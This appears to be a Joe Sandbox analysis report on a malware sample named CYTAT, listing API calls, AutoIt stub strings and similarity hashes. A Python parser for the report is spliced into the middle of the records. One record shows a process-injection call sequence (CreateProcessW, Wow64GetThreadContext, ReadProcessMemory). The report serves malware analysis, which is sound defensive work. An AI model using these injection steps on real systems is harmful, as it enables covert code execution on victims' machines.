                                                • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                APIs
                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                • _free.LIBCMT ref: 004295A0
                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3938964917-2806939583
                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                Strings
                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _strcat
                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                • API String ID: 1765576173-2684727018
                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
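The records above all share one layout: an "APIs" and/or "Strings" list, a "Memory Dump Source" block, the IDA plugin snapshot name, and a "Similarity" block whose API String ID is the key Joe Sandbox uses to match functions across samples. For a report this long it is faster to parse those records than to read them, so here is a small parser as an added example; it is not Joe Sandbox code, the dict key names are my own, and SAMPLE_REPORT is text copied from three records on this page (trimmed, with the "Download File" link residue removed) so the script runs offline. It pulls out direct and subcall API references with their ref addresses, report strings with their xrefs, the dump metadata and the similarity IDs, then answers two questions a triager asks of such a report: which functions reach a given API, and which report strings match a pattern (here the AutoIt stub markers).

```python
"""Parse Joe Sandbox per-function records (the "APIs" / "Strings" / "Memory Dump
Source" / "Joe Sandbox IDA Plugin" / "Similarity" blocks of this report) into
dicts for bulk triage. Added example, not Joe Sandbox code; the dict keys are my
own naming. SAMPLE_REPORT is copied from three records on this page, trimmed,
with the "Download File" link residue removed, so the script runs offline."""
import re

SAMPLE_REPORT = """\
APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Memory Dump Source
• Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID:
• API String ID: 2429186680-0
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
APIs
• _malloc.LIBCMT ref: 0043214B
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _malloc.LIBCMT ref: 0043215D
Memory Dump Source
• Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
Strings
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
Memory Dump Source
• Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _strcat
• String ID: >>>AUTOIT NO CMDEXECUTE<<<
• API String ID: 1765576173-2684727018
• Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# Matches a direct call, a LIBCMT call without argument list, or an indented subcall line.
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")


def _key(label):
    return label.strip().lower().replace(" ", "_")


def parse_records(text):
    """Return one dict per analysed function: apis, strings, dump metadata, similarity IDs."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            # An APIs/Strings heading after a completed Similarity block opens the next function.
            if line in ("APIs", "Strings") and (rec is None or rec["similarity"]):
                rec = {"apis": [], "strings": [], "dump": {"associated": []}, "similarity": {}}
                records.append(rec)
            section = line
        elif rec is None or not line.startswith("•"):
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                rec["apis"].append({**m.groupdict(), "subcall": m["sub"] is not None})
        elif section == "Strings":
            text_part, sep, xrefs = line[1:].strip().rpartition(", xrefs:")
            if not sep:  # string listed without an xref list
                text_part, xrefs = xrefs, ""
            rec["strings"].append({"text": text_part, "xrefs": [x for x in xrefs.replace(" ", "").split(",") if x]})
        elif section == "Similarity":
            label, _, value = line[1:].partition(":")
            rec["similarity"][_key(label)] = value.strip()
        else:  # Memory Dump Source / Joe Sandbox IDA Plugin
            label, _, value = line[1:].strip().partition(": ")
            if label == "Associated":
                rec["dump"]["associated"].append(value)
            else:
                rec["dump"][_key(label)] = value
    return records


def functions_calling(records, api_name, include_subcalls=True):
    """(api_string_id, ref) for every call site reaching api_name; subcalls are the indented lines."""
    return [(r["similarity"].get("api_string_id"), a["ref"]) for r in records for a in r["apis"]
            if a["name"] == api_name and (include_subcalls or not a["subcall"])]


def strings_matching(records, pattern):
    """Sorted distinct report strings matching a regex, e.g. the AutoIt stub markers."""
    rx = re.compile(pattern)
    return sorted({s["text"] for r in records for s in r["strings"] if rx.search(s["text"])})


RECORDS = parse_records(SAMPLE_REPORT)

if __name__ == "__main__":
    print(len(RECORDS), "functions; RtlAllocateHeap via:", functions_calling(RECORDS, "RtlAllocateHeap"))
    print("AutoIt markers:", strings_matching(RECORDS, r"^>>>AUTOIT"))
```

To run it on the full report, save the page as text and pass it to parse_records instead of SAMPLE_REPORT; records that start before the first heading (as this page section does) are skipped until the next "APIs" or "Strings" heading. The API String ID is kept on every record so hits can be pivoted back to the similarity key Joe Sandbox reports.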
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast__wsplitpath_malloc
                                                • String ID:
                                                • API String ID: 4163294574-0
                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                APIs
                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                • _strcat.LIBCMT ref: 0040F786
                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                • String ID:
                                                • API String ID: 3199840319-0
                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                APIs
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FreeInfoLibraryParametersSystem
                                                • String ID:
                                                • API String ID: 3403648963-0
                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                APIs
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                • __lock_file.LIBCMT ref: 00414A8D
                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                APIs
                                                • __lock_file.LIBCMT ref: 00415012
                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03FC0B9B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FC0C31
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FC0C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                • Instruction ID: 350799c56f8b1e9f65395089e658a9a1aee7782055697bc81330ec1ad56d7972
                                                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                • Instruction Fuzzy Hash: 0412DF24E24659C6EB24DF64D8507DEB232EF68300F1094ED910DEB7A4E77A4F81CB5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
